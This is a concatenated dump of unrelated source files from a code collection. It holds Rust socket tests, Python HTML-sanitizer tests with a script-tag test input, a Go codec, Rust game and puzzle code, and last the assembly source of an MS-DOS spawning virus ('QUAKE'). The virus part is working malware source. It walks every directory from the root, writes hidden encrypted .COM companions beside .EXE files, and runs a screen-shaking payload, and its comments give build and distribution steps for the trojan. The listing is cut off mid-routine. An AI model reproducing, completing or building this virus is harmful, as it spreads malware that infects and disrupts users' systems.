expect_no_events(&mut poll, &mut events);
// Close the connection to allow the remote to shutdown
drop(stream);
assert_ok!(handle.join());
}
#[test]
fn unix_stream_reregister() {
let (mut poll, mut events) = init_with_poll();
let (handle, remote_addr) = new_echo_listener(1);
let path = remote_addr.as_pathname().expect("failed to get pathname");
let stream = assert_ok!(UnixStream::connect(path));
assert_ok!(poll
.registry()
.register(&stream, TOKEN_1, Interests::READABLE));
assert_ok!(poll
.registry()
.reregister(&stream, TOKEN_1, Interests::WRITABLE));
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
);
// Close the connection to allow the remote to shutdown
drop(stream);
assert_ok!(handle.join());
}
#[test]
fn unix_stream_deregister() {
let (mut poll, mut events) = init_with_poll();
let (handle, remote_addr) = new_echo_listener(1);
let path = remote_addr.as_pathname().expect("failed to get pathname");
let stream = assert_ok!(UnixStream::connect(path));
assert_ok!(poll
.registry()
.register(&stream, TOKEN_1, Interests::WRITABLE));
assert_ok!(poll.registry().deregister(&stream));
expect_no_events(&mut poll, &mut events);
// Close the connection to allow the remote to shutdown
drop(stream);
assert_ok!(handle.join());
}
fn smoke_test<F>(connect_stream: F)
where
F: FnOnce(&Path) -> io::Result<UnixStream>,
{
let (mut poll, mut events) = init_with_poll();
let (handle, remote_addr) = new_echo_listener(1);
let path = remote_addr.as_pathname().expect("failed to get pathname");
let mut stream = assert_ok!(connect_stream(path));
assert_ok!(poll.registry().register(
&stream,
TOKEN_1,
Interests::WRITABLE.add(Interests::READABLE)
));
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
);
let mut buf = [0; DEFAULT_BUF_SIZE];
assert_would_block(stream.read(&mut buf));
let wrote = assert_ok!(stream.write(&DATA1));
assert_eq!(wrote, DATA1_LEN);
assert_ok!(stream.flush());
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::READABLE)],
);
let read = assert_ok!(stream.read(&mut buf));
assert_eq!(read, DATA1_LEN);
assert_eq!(&buf[..read], DATA1);
assert_eq!(read, wrote, "unequal reads and writes");
assert!(assert_ok!(stream.take_error()).is_none());
let bufs = [IoSlice::new(&DATA1), IoSlice::new(&DATA2)];
let wrote = assert_ok!(stream.write_vectored(&bufs));
assert_eq!(wrote, DATA1_LEN + DATA2_LEN);
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::READABLE)],
);
let mut buf1 = [1; DATA1_LEN];
let mut buf2 = [2; DATA2_LEN + 1];
let mut bufs = [IoSliceMut::new(&mut buf1), IoSliceMut::new(&mut buf2)];
let read = assert_ok!(stream.read_vectored(&mut bufs));
assert_eq!(read, DATA1_LEN + DATA2_LEN);
assert_eq!(&buf1, DATA1);
assert_eq!(&buf2[..DATA2.len()], DATA2);
// Last byte should be unchanged
assert_eq!(buf2[DATA2.len()], 2);
// Close the connection to allow the remote to shutdown
drop(stream);
assert_ok!(handle.join());
}
fn new_echo_listener(connections: usize) -> (thread::JoinHandle<()>, net::SocketAddr) {
let (addr_sender, addr_receiver) = channel();
let handle = thread::spawn(move || {
let dir = assert_ok!(TempDir::new("unix"));
let path = dir.path().join("any");
let listener = assert_ok!(net::UnixListener::bind(path));
let local_addr = assert_ok!(listener.local_addr());
assert_ok!(addr_sender.send(local_addr));
for _ in 0..connections {
let (mut stream, _) = assert_ok!(listener.accept());
// On Linux based system it will cause a connection reset
// error when the reading side of the peer connection is
// shutdown, we don't consider it an actual here.
let (mut read, mut written) = (0, 0);
let mut buf = [0; DEFAULT_BUF_SIZE];
loop {
let n = match stream.try_read(&mut buf) {
Ok(Some(amount)) => {
read += amount;
amount
}
Ok(None) => continue,
Err(ref err) if err.kind() == io::ErrorKind::ConnectionReset => break,
Err(err) => panic!("{}", err),
};
if n == 0 {
break;
}
match stream.try_write(&buf[..n]) {
Ok(Some(amount)) => written += amount,
Ok(None) => continue,
Err(ref err) if err.kind() == io::ErrorKind::BrokenPipe => break,
Err(err) => panic!("{:?}", err),
};
}
assert_eq!(read, written, "unequal reads and writes");
}
});
(handle, assert_ok!(addr_receiver.recv()))
}
fn new_noop_listener(
connections: usize,
barrier: Arc<Barrier>,
) -> (thread::JoinHandle<()>, net::SocketAddr) {
let (sender, receiver) = channel();
let handle = thread::spawn(move || {
let dir = assert_ok!(TempDir::new("unix"));
let path = dir.path().join("any");
let listener = assert_ok!(net::UnixListener::bind(path));
let local_addr = assert_ok!(listener.local_addr());
assert_ok!(sender.send(local_addr));
for _ in 0..connections {
let (stream, _) = assert_ok!(listener.accept());
barrier.wait();
assert_ok!(stream.shutdown(Shutdown::Write));
barrier.wait();
drop(stream);
}
});
(handle, assert_ok!(receiver.recv()))
}
| 30.261947 | 98 | 0.612352 | 3.03125 |
f03d4c226a3b3aa190f45b9620b4a20bd1deafdc | 2,296 | py | Python | isso/tests/test_html.py | Nildeala/isso | 661f2a68813e6ba5c234c9b84f440681712cdcef | [
"MIT"
] | 1 | 2017-08-24T21:10:01.000Z | 2017-08-24T21:10:01.000Z | isso/tests/test_html.py | Nildeala/isso | 661f2a68813e6ba5c234c9b84f440681712cdcef | [
"MIT"
] | null | null | null | isso/tests/test_html.py | Nildeala/isso | 661f2a68813e6ba5c234c9b84f440681712cdcef | [
"MIT"
] | null | null | null |
try:
import unittest2 as unittest
except ImportError:
import unittest
from isso.core import Config
from isso.utils import html
class TestHTML(unittest.TestCase):
def test_markdown(self):
convert = html.Markdown(extensions=())
examples = [
("*Ohai!*", "<p><em>Ohai!</em></p>"),
("<em>Hi</em>", "<p><em>Hi</em></p>"),
("http://example.org/", '<p>http://example.org/</p>')]
for (input, expected) in examples:
self.assertEqual(convert(input), expected)
def test_markdown_extensions(self):
convert = html.Markdown(extensions=("strikethrough", "superscript"))
examples = [
("~~strike~~ through", "<p><del>strike</del> through</p>"),
("sup^(script)", "<p>sup<sup>script</sup></p>")]
for (input, expected) in examples:
self.assertEqual(convert(input), expected)
@unittest.skipIf(html.html5lib_version == "0.95", "backport")
def test_sanitizer(self):
sanitizer = html.Sanitizer(elements=[], attributes=[])
examples = [
('Look: <img src="..." />', 'Look: '),
('<a href="http://example.org/">Ha</a>', '<a href="http://example.org/">Ha</a>'),
('<a href="sms:+1234567890">Ha</a>', '<a>Ha</a>'),
('<p style="visibility: hidden;">Test</p>', '<p>Test</p>'),
('<script>alert("Onoe")</script>', 'alert("Onoe")')]
for (input, expected) in examples:
self.assertEqual(html.sanitize(sanitizer, input), expected)
@unittest.skipIf(html.html5lib_version == "0.95", "backport")
def test_sanitizer_extensions(self):
sanitizer = html.Sanitizer(elements=["img"], attributes=["src"])
examples = [
('<img src="cat.gif" />', '<img src="cat.gif">'),
('<script src="doge.js"></script>', '')]
for (input, expected) in examples:
self.assertEqual(html.sanitize(sanitizer, input), expected)
def test_render(self):
conf = Config.load(None).section("markup")
renderer = html.Markup(conf).render
self.assertEqual(renderer("http://example.org/ and sms:+1234567890"),
'<p><a href="http://example.org/">http://example.org/</a> and sms:+1234567890</p>')
| 37.639344 | 108 | 0.562718 | 3.09375 |
dd3594ddcffff304ad5bfce073709e244836ee0f | 1,591 | go | Go | codec/length_prefix.go | muirglacier/aw | 4245f85a37e6483f530da62354d27131d263334f | [
"MIT"
] | 36 | 2019-07-05T23:54:00.000Z | 2022-03-17T10:07:56.000Z | codec/length_prefix.go | muirglacier/aw | 4245f85a37e6483f530da62354d27131d263334f | [
"MIT"
] | 39 | 2019-07-29T07:15:06.000Z | 2021-08-03T05:02:13.000Z | codec/length_prefix.go | muirglacier/aw | 4245f85a37e6483f530da62354d27131d263334f | [
"MIT"
] | 8 | 2019-08-23T19:10:03.000Z | 2021-12-10T06:54:07.000Z | package codec
import (
"encoding/binary"
"fmt"
"io"
)
// LengthPrefixEncoder returns an Encoder that prefixes all data with a uint32
// length. The returned Encoder wraps two other Encoders, one that is used to
// encode the length prefix, and one that is used to encode the actual data.
func LengthPrefixEncoder(prefixEnc Encoder, bodyEnc Encoder) Encoder {
return func(w io.Writer, buf []byte) (int, error) {
prefix := uint32(len(buf))
prefixBytes := [4]byte{}
binary.BigEndian.PutUint32(prefixBytes[:], prefix)
if _, err := prefixEnc(w, prefixBytes[:]); err != nil {
return 0, fmt.Errorf("encoding data length: %w", err)
}
n, err := bodyEnc(w, buf)
if err != nil {
return n, fmt.Errorf("encoding data: %w", err)
}
return n, nil
}
}
// LengthPrefixDecoder returns an Decoder that assumes all data is prefixed with
// a uint32 length. The returned Decoder wraps two other Decoders, one that is
// used to decode the length prefix, and one that is used to decode the actual
// data.
func LengthPrefixDecoder(prefixDec Decoder, bodyDec Decoder) Decoder {
return func(r io.Reader, buf []byte) (int, error) {
prefixBytes := [4]byte{}
if _, err := prefixDec(r, prefixBytes[:]); err != nil {
return 0, fmt.Errorf("decoding data length: %w", err)
}
prefix := binary.BigEndian.Uint32(prefixBytes[:])
if uint32(len(buf)) < prefix {
return 0, fmt.Errorf("decoding data length: expected %v, got %v", len(buf), prefix)
}
n, err := bodyDec(r, buf[:prefix])
if err != nil {
return n, fmt.Errorf("decoding data: %w", err)
}
return n, nil
}
}
| 32.469388 | 86 | 0.68259 | 3.234375 |
d942e7026d94c61f6fe7ac42764aeadfcf3bd1fe | 3,645 | rs | Rust | src/components/launcher.rs | ericrasmussen/quatronaut2020 | fecb38274526b0fe33c95e2701a5d8bd72b3bba8 | [
"MIT"
] | 1 | 2021-04-17T20:33:33.000Z | 2021-04-17T20:33:33.000Z | src/components/launcher.rs | ericrasmussen/benitron3000 | fecb38274526b0fe33c95e2701a5d8bd72b3bba8 | [
"MIT"
] | 52 | 2020-10-14T06:38:00.000Z | 2022-03-21T00:16:44.000Z | src/components/launcher.rs | ericrasmussen/benitron3000 | fecb38274526b0fe33c95e2701a5d8bd72b3bba8 | [
"MIT"
] | 1 | 2020-10-02T16:54:13.000Z | 2020-10-02T16:54:13.000Z | //! This component tracks when and how to fire projectiles,
//! along with logic to create different projectiles.
use amethyst::{
assets::PrefabData,
core::Transform,
derive::PrefabData,
ecs::prelude::{Component, DenseVecStorage, Entities, Entity, LazyUpdate, NullStorage, ReadExpect, WriteStorage},
renderer::{sprite::SpriteSheetHandle, SpriteRender},
Error,
};
use rand::{thread_rng, Rng};
use serde::{Deserialize, Serialize};
use crate::components::{
collider::Collider,
movement::{Movement, MovementType},
tags::CleanupTag,
};
use crate::resources::audio::SoundType;
/// This is used by the boss enemy that fires projectiles. The
/// launcher lets us control the firing rate and projectile speed.
#[derive(Clone, Copy, Debug, Deserialize, Serialize, PrefabData)]
#[prefab(Component)]
#[serde(deny_unknown_fields)]
pub struct Launcher {
pub fire_delay: f32,
pub projectile_speed: f32,
pub seconds_since_firing: f32,
}
impl Launcher {
/// Checks if we've had enough time elapse since the last laser
/// and resets the timer. this is possibly a surprising API for a
/// `bool` check, but it also ensures we don't rely on calling code
/// to manage the timer.
pub fn can_fire(&mut self, time: f32) -> bool {
// this offset here is to make the firing less predictable,
// which is important when multiple enemies would otherwise fire
// each shot at the same time
if self.seconds_since_firing >= self.fire_delay {
let mut rng = thread_rng();
self.seconds_since_firing = rng.gen_range(0.1 .. 0.9);
true
} else {
self.seconds_since_firing += time;
false
}
}
}
impl Component for Launcher {
type Storage = DenseVecStorage<Self>;
}
/// Empty struct that lets us tag entities as `Projectile`s. The `systems`
/// module needs this for looking them up.
#[derive(Debug, Default)]
pub struct Projectile;
impl Component for Projectile {
type Storage = NullStorage<Self>;
}
/// This needs to be run by a system that has a launcher, sprites, transforms,
/// and all entities. It creates an entity with all the necessary components
/// for systems to operate on the projectile (moving it, detecting collisions,
/// checking if it's out of bounds, etc).
pub fn launch_projectile(
launcher: Launcher,
sprite_sheet_handle: SpriteSheetHandle,
base_transform: &Transform,
entities: &Entities,
lazy_update: &ReadExpect<LazyUpdate>,
) {
// an incorrect sprite number here will lead to a memory leak
let sprite_render = SpriteRender {
sprite_sheet: sprite_sheet_handle,
sprite_number: 3,
};
let transform = base_transform.clone();
let movement = Movement {
speed: launcher.projectile_speed,
velocity_x: 0.0,
velocity_y: 0.0,
freeze_direction: false,
locked_direction: None,
already_rotated: false,
launch_sound: Some(SoundType::EnemyBlaster),
movement_type: MovementType::ProjectileRush,
};
let collider = Collider {
half_width: 16.0,
half_height: 16.0,
};
let projectile = Projectile {};
let cleanup_tag = CleanupTag {};
let projectile_entity: Entity = entities.create();
lazy_update.insert(projectile_entity, projectile);
lazy_update.insert(projectile_entity, cleanup_tag);
lazy_update.insert(projectile_entity, movement);
lazy_update.insert(projectile_entity, transform);
lazy_update.insert(projectile_entity, collider);
lazy_update.insert(projectile_entity, sprite_render);
}
| 31.973684 | 116 | 0.687791 | 3.015625 |
ada541d03d501f3f49006046587dfaeaa1e3f73b | 7,100 | rs | Rust | task12_1/src/main.rs | HaronK/aoc2019 | 958c0a8fa125fbdc463115a78966fd31b3da7efb | [
"MIT"
] | 1 | 2019-12-12T13:11:51.000Z | 2019-12-12T13:11:51.000Z | task12_1/src/main.rs | HaronK/aoc2019 | 958c0a8fa125fbdc463115a78966fd31b3da7efb | [
"MIT"
] | null | null | null | task12_1/src/main.rs | HaronK/aoc2019 | 958c0a8fa125fbdc463115a78966fd31b3da7efb | [
"MIT"
] | null | null | null | use anyhow::Result;
use std::fmt;
use std::fs::File;
use std::io::prelude::*;
use std::ops::*;
// use termion;
fn main() -> Result<()> {
let mut content = String::new();
let mut file = File::open("input.txt")?;
file.read_to_string(&mut content)?;
let mut moons = parse(content)?;
let period = get_full_turn_period(&mut moons);
let total = total_energy(1000, &mut moons);
println!("Moons:");
dump_moons(&moons);
println!("Period: {}", period);
println!("Total energy: {}", total);
Ok(())
}
fn dump_moons(moons: &[Moon]) {
for moon in moons {
println!(" {}", moon);
}
}
fn total_energy(steps: usize, moons: &mut Vec<Moon>) -> usize {
for _s in 0..steps {
// println!("Step {}", s);
// dump_moons(&moons);
// println!("{}{}Step: ={}=", termion::clear::All, termion::cursor::Goto(1, 1), s);
// std::io::stdout().flush().unwrap();
process_once(moons);
}
// println!("After final step");
// dump_moons(&moons);
moons.iter().map(|m| m.energy()).sum()
}
fn get_full_turn_period(moons: &mut Vec<Moon>) -> usize {
let mut period: usize = 0;
let mut moons_period = vec![0; 3];
let orig = moons.clone();
loop {
period += 1;
process_once(moons);
if moons_period[0] == 0 && moons.iter().enumerate().all(|(i, m)| m.cmp_x(&orig[i])) {
moons_period[0] = period;
}
if moons_period[1] == 0 && moons.iter().enumerate().all(|(i, m)| m.cmp_y(&orig[i])) {
moons_period[1] = period;
}
if moons_period[2] == 0 && moons.iter().enumerate().all(|(i, m)| m.cmp_z(&orig[i])) {
moons_period[2] = period;
}
// println!("{}Step: {} Periods: {:?}", termion::cursor::Goto(1, 1), period, moons_period);
// std::io::stdout().flush().unwrap();
if moons_period.iter().all(|&p| p != 0) {
break;
}
}
let lcm1 = lcm(moons_period[0] + 1, moons_period[1] + 1);
lcm(lcm1, moons_period[2] + 1)
}
fn process_once(moons: &mut Vec<Moon>) {
let moons_len = moons.len();
for i in 1..moons_len {
let (left, right) = moons.split_at_mut(i);
// println!("left={} right={}", left.len(), right.len());
let this = &mut left[left.len() - 1];
for mut other in right {
this.update_vel(&mut other);
}
this.apply_vel();
}
moons[moons_len - 1].apply_vel();
}
fn lcm(v1: usize, v2: usize) -> usize {
v1 * v2 / gcd(v1, v2)
// while v1 != 0 {
// let old_v1 = v1;
// v1 = v2 % v1;
// v2 = old_v1;
// }
// v2
}
fn gcd(mut v1: usize, mut v2: usize) -> usize {
while v1 != 0 {
let old_v1 = v1;
v1 = v2 % v1;
v2 = old_v1;
}
v2
}
type CoordinateType = i64;
#[derive(Clone, PartialEq)]
struct Node3D {
x: CoordinateType,
y: CoordinateType,
z: CoordinateType,
}
impl Node3D {
fn new(x: CoordinateType, y: CoordinateType, z: CoordinateType) -> Self {
Self { x, y, z }
}
}
impl Default for Node3D {
fn default() -> Self {
Self { x: 0, y: 0, z: 0 }
}
}
impl AddAssign for Node3D {
fn add_assign(&mut self, other: Self) {
*self = Self {
x: self.x + other.x,
y: self.y + other.y,
z: self.z + other.z,
};
}
}
impl Neg for Node3D {
type Output = Node3D;
fn neg(self) -> Self::Output {
Self {
x: -self.x,
y: -self.y,
z: -self.z,
}
}
}
impl fmt::Display for Node3D {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "<{}, {}, {}>", self.x, self.y, self.z)
}
}
#[derive(Clone, PartialEq)]
struct Moon {
pos: Node3D,
vel: Node3D,
}
impl Moon {
fn new(x: CoordinateType, y: CoordinateType, z: CoordinateType) -> Self {
Self {
pos: Node3D::new(x, y, z),
vel: Node3D::default(),
}
}
fn update_vel(&mut self, other: &mut Moon) {
if self.pos.x < other.pos.x {
self.vel.x += 1;
other.vel.x -= 1;
} else if self.pos.x > other.pos.x {
self.vel.x -= 1;
other.vel.x += 1;
}
if self.pos.y < other.pos.y {
self.vel.y += 1;
other.vel.y -= 1;
} else if self.pos.y > other.pos.y {
self.vel.y -= 1;
other.vel.y += 1;
}
if self.pos.z < other.pos.z {
self.vel.z += 1;
other.vel.z -= 1;
} else if self.pos.z > other.pos.z {
self.vel.z -= 1;
other.vel.z += 1;
}
}
fn apply_vel(&mut self) {
self.pos += self.vel.clone();
}
fn potential(&self) -> usize {
(self.pos.x.abs() + self.pos.y.abs() + self.pos.z.abs()) as usize
}
fn kinetic(&self) -> usize {
(self.vel.x.abs() + self.vel.y.abs() + self.vel.z.abs()) as usize
}
fn energy(&self) -> usize {
self.potential() * self.kinetic()
}
fn cmp_x(&self, other: &Moon) -> bool {
self.pos.x == other.pos.x
}
fn cmp_y(&self, other: &Moon) -> bool {
self.pos.y == other.pos.y
}
fn cmp_z(&self, other: &Moon) -> bool {
self.pos.z == other.pos.z
}
}
impl fmt::Display for Moon {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "pos={}, vel={}", self.pos, self.vel)
}
}
fn parse<S: AsRef<str>>(positions: S) -> Result<Vec<Moon>> {
let mut moons = Vec::new();
for position in positions.as_ref().lines() {
let pos_str = position.trim();
if pos_str.is_empty() {
break;
}
let coord_str = &pos_str[1..pos_str.len() - 1];
let coord_vec: Vec<&str> = coord_str.split(',').map(|c| c.trim()).collect();
let x: CoordinateType = coord_vec[0][2..].parse()?;
let y: CoordinateType = coord_vec[1][2..].parse()?;
let z: CoordinateType = coord_vec[2][2..].parse()?;
moons.push(Moon::new(x, y, z));
}
Ok(moons)
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test1() -> Result<()> {
common_test(
179,
2772,
10,
r#"<x=-1, y=0, z=2>
<x=2, y=-10, z=-7>
<x=4, y=-8, z=8>
<x=3, y=5, z=-1>"#,
)
}
#[test]
fn test2() -> Result<()> {
common_test(
1940,
4_686_774_924,
100,
r#"<x=-8, y=-10, z=0>
<x=5, y=5, z=10>
<x=2, y=-7, z=3>
<x=9, y=-8, z=-3>"#,
)
}
fn common_test(
expected_total: usize,
expected_period: usize,
steps: usize,
moons_str: &str,
) -> Result<()> {
let mut moons = parse(moons_str)?;
assert_eq!(expected_period, get_full_turn_period(&mut moons));
moons = parse(moons_str)?;
assert_eq!(expected_total, total_energy(steps, &mut moons));
Ok(())
}
}
| 23.58804 | 99 | 0.486901 | 3.328125 |
3fdd781f9e50b90b5ad1e5c8b4ac2e2d7bdb1c4c | 29,800 | asm | Assembly | MSDOS/Virus.MSDOS.Unknown.vclquake.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:13.000Z | 2022-03-16T09:11:05.000Z | MSDOS/Virus.MSDOS.Unknown.vclquake.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | null | null | null | MSDOS/Virus.MSDOS.Unknown.vclquake.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:15.000Z | 2022-01-08T20:51:04.000Z | ; -----------------------------------------------------------------------------
; QUAKE.ASM
; Created with Nowhere Man's Virus Creation Laboratory v1.00
;
; Heavily modified VCL and Original Code by the best Bleeding Edge virus
; writer: Night Breeze. See you all in fuckin' HELL!
;
; This is a "spawning" virus and, technically, a trojan horse. First time it
; is run, it will do the earthquake thing - but only after infecting another
; file first! When the infected file is executed (in it's directory) then it
; will infect another file and run the app. Then, when all files on that drive
; are infected, it will again do the earthquake thing!
;
; Build instructions:
;
; Assemble QUAKE.ASM to QUAKE.COM
; d:\tasm\tasm /mx /m2 /q /t quake
; link quake;
; exe2bin quake.exe quake.com
;
; Run QUAKE.COM and file the infected file...<g>
; Find file
; ATTRIB *.COM -r -h
;
; Get a copy of that file as it is encrypted...
; COPY filename.COM \mydir\TEMP.COM
;
; Compile QINJECT.PAS
;
; Cat the two files:
; COPY /b TEMP.COM+QINJECT.EXE QUAKE.EXE (i know, overwrites)
;
; Now, QINJECT actually as the same strings (most) as QUAKE.COM, so if the
; user types or debugs the program, will see the strings. The REAL virus
; is hidden, and encrypted, at the start of QUAKE.EXE (it's really a com file).
;
; NOTE: The flag SHOW_FLAG is used to allow an intial infection, then to all
; the victim to see an apparently good program - although he is getting
; fucked :)
;
;
; If all that was too hard... just distribute the enclosed EARTH.EXE program:)
;
; -----------------------------------------------------------------------------
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
; -----------------------------------------------------------------------------
main proc near
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
inc Show_Flag ; Inc infect count
mov si, offset spawn_name ; Save a copy of the
mov di, offset save_name ; file to "spawn"
cld
mov cx, 14 ; It's allways 14 bytes
rep movsb
call search_files ; Find and infect a file
mov al,byte ptr [set_carry] ; AX holds ALL INFECTED value
cmp al, 0 ; Have we infected all files?
jz Effect ; If so, then do it!
cmp Show_Flag,3 ; Should we show display?
jl Effect
jmp short end00
Effect:
call EarthQuake ; Let's do it!
jmp short Finito ; And don't run app!
end00:
mov ah,04Ah ; DOS resize memory function
mov bx,(finish - start) / 16 + 0272h ; BX holds # of para.
int 021h
mov sp,(finish - start) + 01100h ; Change top of stack
mov si,offset save_name ; SI points to true filename
int 02Eh ; DOS execution back-door
Finito:
mov ah,04Ch ; DOS terminate function
int 021h
main endp
; -----------------------------------------------------------------------------
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
mov dx,offset root ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
; -----------------------------------------------------------------------------
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
mov dx,offset all_files ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
mov dx,offset up_dir ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
mov dx,offset exe_mask ; DX points to "*.EXE"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
exe_mask db "*.EXE",0 ; Mask for all .EXE files
traverse endp
; -----------------------------------------------------------------------------
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx, 00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
; -----------------------------------------------------------------------------
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov di,bx ; DI points to the DTA
lea si,[di + 01Eh] ; SI points to file name
mov dx,si ; DX points to file name, too
mov di,offset spawn_name + 1; DI points to new name
xor ah,ah ; AH holds character count
transfer_loop: lodsb ; Load a character
or al,al ; Is it a NULL?
je transfer_end ; If so then leave the loop
inc ah ; Add one to the character count
stosb ; Save the byte in the buffer
jmp short transfer_loop ; Repeat the loop
transfer_end:
mov byte ptr [spawn_name],ah; First byte holds char. count
mov byte ptr [di],13 ; Make CR the final character
mov di,dx ; DI points to file name
xor ch,ch ;
mov cl,ah ; CX holds length of filename
mov al,'.' ; AL holds char. to search for
repne scasb ; Search for a dot in the name
mov word ptr [di],'OC' ; Store "CO" as first two bytes
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
mov byte ptr [set_carry],0 ; Assume we'll fail
mov ax,03D00h ; DOS open file function, r/o
int 021h
jnc infection_done ; File already exists, so leave
mov byte ptr [set_carry],1 ; Success -- the file is OK
mov ah,03Ch ; DOS create file function
mov cx, 00100011b ; CX holds file attributes
int 021h
xchg bx,ax ; BX holds file handle
call encrypt_code ; Write an encrypted copy
mov ah,03Eh ; DOS close file function
int 021h
infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
ret ; Return to caller
; -----------------------------------------------------------------------------
spawn_name db 0, 12 dup (?),13 ; Name for next spawn
save_name db 0, 12 dup (?),13 ; Name for current spawn
show_flag db 0 ; When 0 & 1 then show display
set_carry db ? ; Set-carry-on-exit flag
infect_file endp
; =============================================================================
EarthQuake proc near
call InitCrt ; Initialize the vars
call DrawFrame ; Draw a frame in middle of screen
mov cx, 2 ; Make some noise
call Siren
mov si, OFFSET Warning ; Put Msg 1
mov dx,0718h ; Move to Row 8, column 20
call WriteStr
mov cx, 1
call Siren
mov si, OFFSET ToHills ; Put Msg 2
mov dx,0A16h ; Move to Row 10, column 18
call WriteStr
mov cx, 2 ; More noise
call Siren
call Shake ; Shake the screen - it's a quake!
call DrawFrame ; Draw a frame in middle of screen
mov si, OFFSET MadeIt ; Put Made It Msg
mov dx,081Fh
call WriteStr
cmp Show_Flag, 3
jl EarthDone
mov si, OFFSET BurmaShave ; Put Logo
mov dx,0C36h
call WriteStr
EarthDone:
ret
EarthQuake endp
Warning db '* * * Earthquake Warning! * * *', 0
ToHills db 'Head for the hills! Take cover!!!', 0
MadeIt db 'Whew! We Made It!', 0
BurmaShave db '-=[VCL/BEv]=-', 0
Table struc ; Structure of the Shaker Table
Iters db 0 ; Number of interations (quakes)
Cols db 0 ; Scroll number of columns
Pause dw 0 ; And then wait this much time
Table ends
QuakeTable Table < 3, 1, 500>
Table < 4, 2, 250>
Table < 5, 3, 175>
Table < 6, 4, 100>
Table <10, 5, 30>
Table <20, 5, 10>
Table <10, 5, 30>
Table < 5, 4, 100>
Table < 4, 3, 175>
Table < 3, 2, 250>
Table < 2, 1, 500>
Table < 0, 0, 0> ; End of data
; -----------------------------------------------------------------------------
Shake proc near
mov si, OFFSET QuakeTable ; Get pointer to table
xor cx,cx
ShakeNext:
mov cl, [si].Iters
jcxz ShakeDone
ShakeInner:
push cx ; Save for later
push si ; ditto
xor ax,ax ; duh...
mov al, [si].Cols ; Number of columns to scroll
push ax ; Get Ready
call ScrollRight ; Go...Scroll Screen to right
pop si ; Restore it
cmp [si].Cols, 3 ; Check if we are scrolling more than 3
jle ShakeCont1 ; If less or equal then skip vert scroll
mov ah, 6 ; Scroll up 1 line
call Scroll ; Do it.
ShakeCont1:
mov cx, [si].Pause ; delay period
call Delay ; Wait around a bit
push si ; And save our table index for l8r
xor ax,ax ; duh...
mov al, [si].Cols ; Number of columns to scroll
push ax ; Get Ready...Set...
call ScrollLeft ; Go! ... Scroll screen left
pop si ; And restore our table index
cmp [si].Cols, 3 ; Check if we are scrolling more than 3
jle ShakeCont2 ; If less or equal then skip vert scroll
mov ah, 7 ; Scroll up 1 line
call Scroll ; Do it.
ShakeCont2:
mov cx, [si].Pause ; pause again
call Delay ; Do it.
pop cx ; Get back our iteration counter
Loop ShakeInner ; Keep going
add si, 4 ; Move to next table element
jmp short ShakeNext ; Keep on doing it...
ShakeDone:
ret
Shake endp
; -----------------------------------------------------------------------------
; in: cx = number of times to do the siren
Siren proc near
KeepGoing:
push cx ; Save the count
mov ax, 880 ; Freq
mov bx, 500 ; Duration = 1/2 second
push ax ; Put Freq on stack
